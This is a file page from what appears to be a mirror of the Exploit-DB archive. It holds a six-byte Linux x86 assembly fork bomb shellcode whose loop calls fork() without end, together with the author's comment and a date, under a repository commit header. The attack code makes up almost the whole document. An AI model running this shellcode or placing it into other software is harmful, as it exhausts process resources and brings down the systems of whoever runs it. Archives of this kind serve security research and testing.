exploit-db-mirror/shellcodes/linux_x86/13578.asm
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

15 lines
No EOL
192 B
NASM

Smallest fork bomb shellcode I could make.
; linux/x86 fork bomb 6 bytes
; root@thegibson
; 2009-12-30
section .text
global _start
_start:
; fork()
mov al, 2
int 0x80
jmp short _start